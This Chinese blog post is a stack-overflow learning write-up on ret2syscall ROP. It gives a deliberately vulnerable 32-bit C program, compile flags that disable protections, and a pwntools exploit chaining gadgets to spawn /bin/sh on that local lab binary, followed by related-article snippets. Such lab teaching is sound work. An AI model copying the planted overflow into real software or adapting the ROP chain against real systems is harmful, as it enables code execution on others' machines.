pwn栈溢出学习 基本ROP——ret2syscall

最新推荐文章于 2023-05-06 20:04:18 发布
最新推荐文章于 2023-05-06 20:04:18 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: Pwn 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121589553
版权

pwn栈溢出学习 基本ROP——ret2syscall

1.实验程序

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>
void exploit()
{
    system("/bin/sh");
}
void func()
{
char str[0x20];
read(0,str,0x50);
}
int main()
{
func();
return 0;
}

2.gcc编译

将其编译,不使用堆栈保护,且需要设置成静态编译即-static,否则将找不到这个程序的指令流。

gcc -no-pie -fno-stack-protector  -static -m32  ret2syscall.c -o ret2syscall

3.用pwndgb或peda计算溢出长度

在这里插入图片描述

cyclic 100
cyclic -l laaa

4.通过ROPgadget这个工具来获取指令的位置

在这里插入图片描述
在这里插入图片描述

从pop、ret序列当中寻找其中的eax
从pop、ret序列当中寻找其中的ebx、ecx、dex
找"/bin/sh"这个字符串的地址
int中断找"0x80"

5.exp

from pwn import *

sh = process('./ret2syscall')

pop_eax_ret = 0x080a8c16
pop_edx_ecx_ebx_ret = 0x0806e281
int_0x80 = 0x08049533
binsh = 0x080ac1a8
payload = flat(
    ['A' * 44, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()
==Microsoft==
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF|HITCON-Training-master lab5 writeup(ret2syscall型)
skyattractive的博客
06-12 386
CTF|HITCON-Training-master lab5 writeup 目的文件名是“simplerop” 意思是对rop链的简单利用 shift+f12 查看后,目既没有给system函数又没有‘/bin/sh’ 大致判断是CTFwiki上基本rop中的ret2syscall类型的目 大致思路是, 在文件中需寻找有用的gadget 通过目中存在的栈溢出 将‘/bin/sh’写入文件中的bss段(或者data段) 然后将执行流引导到bss上执行即可 因为文件是32位,‘/bin/sh’需
ret2Syscall writeup
Morphy_Amo的博客
12-14 1350
: ret2Syscall 查看安全策略 [*] '/root/ctf/Other/pwn/ret2syscall' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 开启了NX enabled 查看字符串和方法 未发现可以利用直接或间接调用的system函
栈溢出ropsyscall
06-06 304
当程序开启了nx,但程序有syscall调用的时候。这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pwn的心得。 ida配合gdb定位程序漏洞如下: signed __int64 __fastcall sub_40108E(__int64 a1) { signed __int...
hackme pwn rop2 [syscall + rop]
ACdream
02-05 512
先checksec一下: 有个大概思路:rop过NX main中和overflow函数里都有syscall函数,如下: 观察到这里有缓冲区溢出!"A" * 0xC! 先来学习syscall函数: syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询: cat -n /usr/include/x86_64-linux-gnu/...
buuoj pwn get_started_3dsctf_2016 ret2syscall
yongbaoii的博客
01-29 361
这里记录的是ret2syscall时候出的一些状况,详细的完整版在下面链接 from pwn import * r = process('./2016') elf=ELF('./2016') context.log_level = "debug" bss=0x080eb000 pop_ebx_esi_edi_ret=0x080509a5 syscall_addr = 0x0806357d pop_eax = 0x080b91e6 bss_addr = 0x080eb000 #gdb.attach(r)
pwn07.ret2syscall例
11-11
ret2syscall例
栈溢出基础——ROP1.0的例
07-13
栈溢出基础——ROP1.0的例 在网络安全领域,栈溢出是一种常见的漏洞类型,它源于程序处理内存时的错误,可能导致攻击者控制程序执行流程,从而执行恶意代码。本篇将深入探讨栈溢出的基础知识,并通过一个名为...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
ret2syscall
qq_44759495的博客
07-04 1386
原理 ret2syscall,即控制程序执行系统调用,获取 shell。 步骤 checksec检查是否有保护 可以看出,源程序为 32 位,开启了 NX 保护。接下来利用 IDA 来查看源码 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 ...
PWN简单学习ret2shellcod,ret2syscall
m0_51974791的博客
07-19 306
testret2shellcodeROP---ret2syscall ret2shellcode 在程序中往往不会直接留给回门程序 这时候可以篡改栈帧上的返回地址为攻击者手动传入的 shellcode 所在缓冲区地址,初期往往将 shellcode 直接写入栈缓冲区。 目前由于 the NX bits 保护措施的开启,栈缓冲区不可执行,故当下的常用手段变为向 bss 缓冲区写入 shellcode 或向堆缓冲区写入 shellcode 并使用 mprotect 赋予其可执行权限。 首先看一下基本信息,是一个
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1585
虽然网上(包括CSDN)有很多ret2syscall的例,但大多是Wiki,且摘自官方解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
pwn三连
qq_43613144的博客
07-24 329
‘’
快速计算栈溢出长度
kelxLZ的博客
11-27 1245
Author:ZERO-A-ONE Date:2021-11-27 之前看到网上很多在编写栈溢出的时候计算栈溢出长度的文章,很多工具或者方法放到现在以及没有办法使用了,我经常使用的工具是pwndbg里面调用pwntools的cyclic工具 我们以CTF Wiki里面的示例程序stack-example为例子 首先用IDA找到溢出函数gets的下一个地址为0x804849f,打断点 b *0x804849f 然后使用cyclic工具生成测试字符串 pwndbg> cyclic 200 aaaab.
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 1021
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3399
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
缓冲区溢出-CTF-PWN
04-28
<img src="https://img-bss.csdn.net/202004281305056475.jpg" alt="" />
pwndbg 查看溢出大小
devil8123665的博客
09-16 2037
1、生成输入字符串 pwndbg> cyclic 200 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab 2、运行输入上面字符串 pwndb...
ctfshow PWN 栈溢出
最新发布
08-23
在ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值